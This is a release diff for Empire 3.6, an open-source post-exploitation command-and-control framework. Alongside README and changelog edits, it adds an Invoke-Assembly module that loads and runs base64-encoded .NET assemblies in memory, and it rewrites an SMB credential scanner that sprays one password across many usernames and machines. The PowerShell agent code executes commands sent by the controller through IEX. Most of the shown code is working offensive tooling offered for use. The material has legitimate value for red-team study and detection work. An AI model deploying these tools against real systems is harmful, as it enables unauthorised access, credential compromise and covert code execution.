Empire 3.6 Release

README.md

@@ -20,7 +20,8 @@ On the PowerShell side, Empire implements the ability to run PowerShell agents w
 
 Empire relies heavily on the work from several other projects for its underlying functionality. We have tried to call out a few of those people we've interacted with [heavily here](http://www.powershellempire.com/?page_id=2) and have included author/reference link information in the source of each Empire module as appropriate. If we have failed to properly cite existing or prior work, please let us know at Empire@BC-Security.org.
 
-Empire is currently being developed and maintainted by [@Cx01N](https://twitter.com/Cx01N_), [@Hubbl3](https://twitter.com/_Hubbl3), & [@Vinnybod](https://twitter.com/AZHalcyon). While the main Empire project is no longer maintained, this fork is maintained by [@bcsecurity1](https://twitter.com/BCSecurity1).
+Empire is currently being developed and maintained by [@Cx01N](https://twitter.com/Cx01N_), [@Hubbl3](https://twitter.com/_Hubbl3), & [@Vinnybod](https://twitter.com/AZHalcyon). While the main Empire project is no longer maintained, this fork is maintained by [@bcsecurity1](https://twitter.com/BCSecurity1). 
+Please reach out to us on our [Discord](https://discord.gg/P8PZPyf) if you have any questions or talk about offensive security.
 
 Thank you to the original team of developers: [@harmj0y](https://twitter.com/harmj0y), [@sixdub](https://twitter.com/sixdub), [@enigma0x3](https://twitter.com/enigma0x3), [@rvrsh3ll](https://twitter.com/424f424f), [@killswitch_gui](https://twitter.com/killswitch_gui), & [@xorrior](https://twitter.com/xorrior)
 
@@ -45,7 +46,7 @@ git clone https://github.com/BC-SECURITY/Empire.git
 cd Empire
 sudo ./setup/install.sh
 sudo poetry install
-sudo poetry run python empire --rest
+sudo poetry run python empire --rest -n
 ```
 
 ### Kali
@@ -90,6 +91,11 @@ All image versions can be found at: https://hub.docker.com/r/bcsecurity/empire/
 
 Check out the [Empire wiki](https://github.com/BC-SECURITY/Empire/wiki/Quickstart) for instructions on getting started with Empire.
 
+## Plugins
+Plugins are an extension of Empire that allow for custom scripts to be loaded. This allows anyone to easily build or add
+community projects to extend Empire functionality. Plugins can be accessed from the Empire CLI or the API as long as the 
+plugin follows the [template example](./plugins/example.py). A list of Empire Plugins is located [here](plugins/PLUGINS.md).
+
 ## Contribution Rules
 
 Contributions are more than welcome! The more people who contribute to the project the better Empire will be for everyone. Below are a few guidelines for submitting contributions.

VERSION

@@ -1 +1 @@
-3.5.2
+3.6.0

changelog

@@ -1,3 +1,20 @@
+11/9/2020
+------------
+- Version 3.6.0 Master Release
+        - Added new API endpoints for user and agent notes - #383 (@Cx01N)
+        - Added (readded) PowerView function add-netuser - #381 (@Cx01N)
+        - Added Invoke-SharpChisel module - #368 (@Invoke-Mimikatz)
+        - Added command option to psremoting and smbexec - #380 (@Invoke-Mimikatz)
+        - Added option to use multiple redirector listeners and chaining - #389 (@Cx01N)
+        - Added Invoke-Assembly module - #376 (@Invoke-Mimikatz)
+        - Updated API endpoints for dynamic plugin calls - #383 (@Cx01N)
+        - Updated plugin and module templates - #384 (@Cx01N)
+        - Fixed smbscanner to work on Windows 10 - #380 (@Invoke-Mimikatz)
+        - Fixed update agent comms (updatecomms) not properly changing - #382 (@Cx01N)
+        - Fixed download endpoint formatting and error handling - #383 (@Cx01N)
+        - Fixed issue with passing arguments to Get-DomainSID module - #374 (@mjokic)
+        - Fixed bat file length limit issue - #385 (@Hubbl3)
+
 10/22/2020
 ------------
 - Version 3.5.2 Master Release

data/agent/agent.ps1

@@ -31,7 +31,7 @@ function Invoke-Empire {
 
         .PARAMETER Profile
         http communication profile
-        request_uris(comma separated)|UserAgents(comma separated)
+        request_uris(comma separated)|UserAgents(comma separated)|header1:val(eg. Accept:text/html)|header2:val2(eg. DNT:1)|...
 
         .PARAMETER LostLimit
         The limit of the number of checkins the agent will miss before exiting
@@ -1027,27 +1027,27 @@ function Invoke-Empire {
                 try {
                     IEX $data
 
-                    Encode-Packet -type $type -data ($CurrentListenerName) -ResultID $ResultID
+                    Encode-Packet -type $type -data "[+] Switched the current listener to: $CurrentListenerName" -ResultID $ResultID
                 }
                 catch {
 
-                    Encode-Packet -type 0 -data ("Unable to update agent comm methods: $_") -ResultID $ResultID
+                    Encode-Packet -type 0 -data ("[!] Unable to update agent comm methods: $_") -ResultID $ResultID
                 }
             }
 
             elseif($type -eq 131) {
                 # Update the listener name variable
                 $script:CurrentListenerName = $data
 
-                Encode-Packet -type $type -data ("Updated the CurrentListenerName to: $CurrentListenerName") -ResultID $ResultID
+                Encode-Packet -type $type -data "[+] Updated the CurrentListenerName to: $CurrentListenerName" -ResultID $ResultID
             }
 
             else{
-                Encode-Packet -type 0 -data "invalid type: $type" -ResultID $ResultID
+                Encode-Packet -type 0 -data "[!] invalid type: $type" -ResultID $ResultID
             }
         }
         catch [System.Exception] {
-            Encode-Packet -type $type -data "error running command: $_" -ResultID $ResultID
+            Encode-Packet -type $type -data "[!] error running command: $_" -ResultID $ResultID
         }
     }
 

data/module_source/code_execution/Invoke-Assembly.ps1

@@ -0,0 +1,67 @@
+Function Invoke-Assembly {
+<#
+    .SYNOPSIS
+
+        Loads the compiled .NET code stored in the $asm_data variable and executes the
+        Main() method. Arguments can be passed to the loaded assembly.
+        Powershell port of https://gitlab.com/KevinJClark/csharper
+
+    .EXAMPLE
+
+        This script is not meant to be run outside of Empire. Instead, use
+        the standalone version found here:
+        https://gitlab.com/KevinJClark/csharptoolbox/-/blob/master/Invoke-Assembly.ps1
+
+    .LINK
+
+        https://www.mike-gualtieri.com/posts/red-team-tradecraft-loading-encrypted-c-sharp-assemblies-in-memory
+#>
+	[CmdletBinding()]
+		Param (		
+			[Parameter()]
+			[String[]]$Arguments = ""
+	)
+	$foundMain = $false
+	$asm_data = "~~ASSEMBLY~~"
+	try {
+		$assembly = [Reflection.Assembly]::Load([Convert]::FromBase64String($asm_data))
+	}
+	catch {
+		Write-Output "[!] Could not load assembly. Is it in COFF/MSIL/.NET format?"
+		throw
+	}
+	foreach($type in $assembly.GetExportedTypes()) {
+		foreach($method in $type.GetMethods()) {
+			if($method.Name -eq "Main") {
+				$foundMain = $true
+				if($Arguments[0] -eq "") {
+					Write-Output "Attempting to load assembly with no arguments"
+				}
+				else {
+					Write-Output "Attempting to load assembly with arguments: $Arguments"
+				}
+				$a = (,[String[]]@($Arguments))
+
+				$prevConOut = [Console]::Out
+				$sw = [IO.StringWriter]::New()
+				[Console]::SetOut($sw)
+
+				try {
+					$method.Invoke($null, $a)
+				}
+				catch {
+					Write-Output "[!] Could not invoke assembly or program crashed during execution"
+					throw
+				}
+
+				[Console]::SetOut($PrevConOut)
+				$output = $sw.ToString()
+				Write-Output $output
+			}
+		}
+	}
+	if(!$foundMain) {
+		Write-Output "[!] Could not find public Main() function. Did you set the namespace as public?"
+		throw
+	}
+}

data/module_source/situational_awareness/network/Invoke-SmbScanner.ps1

@@ -6,67 +6,65 @@ function Invoke-SMBScanner {
     If no machines are specified, the domain will be queries for active machines.
     For domain accounts, use the form DOMAIN\username for username specifications.
 
-    Author: Chris Campbell (@obscuresec), mods by @harmj0y
+    Author: Chris Campbell (@obscuresec), mods by @harmj0y, more mods by @kevin
     License: BSD 3-Clause
     Required Dependencies: None
     Optional Dependencies: None
-    Version: 0.1.0
+    Version: 0.1.1
 
 .DESCRIPTION
 
     Tests a username/password combination across a number of machines.
     If no machines are specified, the domain will be queries for active machines.
-    For domain accounts, use the form DOMAIN\username for username specifications.
-
-.EXAMPLE
-
-    PS C:\> Invoke-SMBScanner -ComputerName WINDOWS4 -UserName test123 -Password password123456! -Domain
-
-    ComputerName            Password                                Username
-    ----                    --------                                --------
-    WINDOWS4                password123456!                         test123
-
+    For domain accounts, specify a domain to query 
 
 .EXAMPLE
 
-    PS C:\> Get-Content 'c:\demo\computers.txt' | Invoke-SMBScanner -UserName dev\\test -Password 'Passsword123456!'
+    PS C:\> Invoke-SMBScanner -Domain 'Borgar.local' -ComputerName DC01 -Usernames 'kclark','Administrator','SQLSvc' -Password 'P@ssw0rd'
 
-    ComputerName            Password                                Username
-    ----                    --------                                --------
-    WINDOWS3                password123456!                         dev\\test
-    WINDOWS4                password123456!                         dev\\test
+    ComputerName Domain       Username      Password Valid
+    ------------ ------       --------      -------- -----
+    DC01         Borgar.local kclark        P@ssw0rd False
+    DC01         Borgar.local Administrator P@ssw0rd True
+    DC01         Borgar.local SQLSvc        P@ssw0rd False
 
-    ...
 
-
-.LINK
+    PS C:\> Invoke-SMBScanner -ComputerName '127.0.0.1' -Usernames 'kclark','Administrator','localadmin' -Password 'P@sssw0rd'
 
+    ComputerName Domain Username      Password  Valid
+    ------------ ------ --------      --------  -----
+    127.0.0.1    <None> kclark        P@sssw0rd False
+    127.0.0.1    <None> Administrator P@sssw0rd False
+    127.0.0.1    <None> localadmin    P@sssw0rd True
 
 #>
 
     [CmdletBinding()] Param(
         [Parameter(Mandatory = $False,ValueFromPipeline=$True)]
-        [String] $ComputerName,
+        [String[]] $ComputerName,
 
         [parameter(Mandatory = $True)]
-        [String] $UserName,
+        [String[]] $Usernames,
 
         [parameter(Mandatory = $True)]
         [String] $Password,
+
+        [parameter(Mandatory = $False)]
+        [String] $Domain,
 
         [parameter(Mandatory = $False)]
         [Switch] $NoPing
     )
 
     Begin {
         Set-StrictMode -Version 2
+        [Collections.ArrayList]$OutList = @()
         #try to load assembly
         Try {Add-Type -AssemblyName System.DirectoryServices.AccountManagement}
         Catch {Write-Error $Error[0].ToString() + $Error[0].InvocationInfo.PositionMessage}
     }
 
     Process {
-
         $ComputerNames = @()
 
         # if no computer names are specified, try to query the current domain
@@ -83,8 +81,7 @@ function Invoke-SMBScanner {
         }
 
         foreach ($Computer in $ComputerNames){     
-
-            Try {
+            try {
 
                 Write-Verbose "Checking: $Computer"
 
@@ -94,36 +91,36 @@ function Invoke-SMBScanner {
                 }
                 if($up){
 
-                    if ($Username.contains("\\")) {
-                        # if there's a \ in the username, assume we're checking a domain account
+                    if ($Domain) {
                         $ContextType = [System.DirectoryServices.AccountManagement.ContextType]::Domain
                     }
                     else{
                         # otherwise assume a local account
+                        $Domain = "<None>"
                         $ContextType = [System.DirectoryServices.AccountManagement.ContextType]::Machine
                     }
-
-                    $PrincipalContext = New-Object System.DirectoryServices.AccountManagement.PrincipalContext($ContextType, $Computer)
 
-                    $Valid = $PrincipalContext.ValidateCredentials($Username, $Password).ToString()
-
-                    If ($Valid) {
-                        Write-Verbose "SUCCESS: $Username works with $Password on $Computer"
+                    foreach($Username in $Usernames) {
+                        $PrincipalContext = New-Object System.DirectoryServices.AccountManagement.PrincipalContext($ContextType, $Computer)
+                        $Valid = $PrincipalContext.ValidateCredentials($Username, $Password).ToString()           
 
                         $out = new-object psobject
                         $out | add-member Noteproperty 'ComputerName' $Computer
+                        $out | add-member Noteproperty 'Domain' $Domain
                         $out | add-member Noteproperty 'Username' $Username
                         $out | add-member Noteproperty 'Password' $Password
-                        $out
-                    }
-
-                    Else {
-                        Write-Verbose "FAILURE: $Username did not work with $Password on $ComputerName"
+                        $out | add-member Noteproperty 'Valid' $Valid
+                        $null = $OutList.Add($out)
                     }
                 }
             }
-
-            Catch {Write-Error $($Error[0].ToString() + $Error[0].InvocationInfo.PositionMessage)}
+            catch {
+                Write-Error $($Error[0].ToString() + $Error[0].InvocationInfo.PositionMessage)
+            }
         }
     }
-}
+    End {
+        $OutList | Format-Table
+        Write-Output "SMBScanner execution completed"
+    }
+}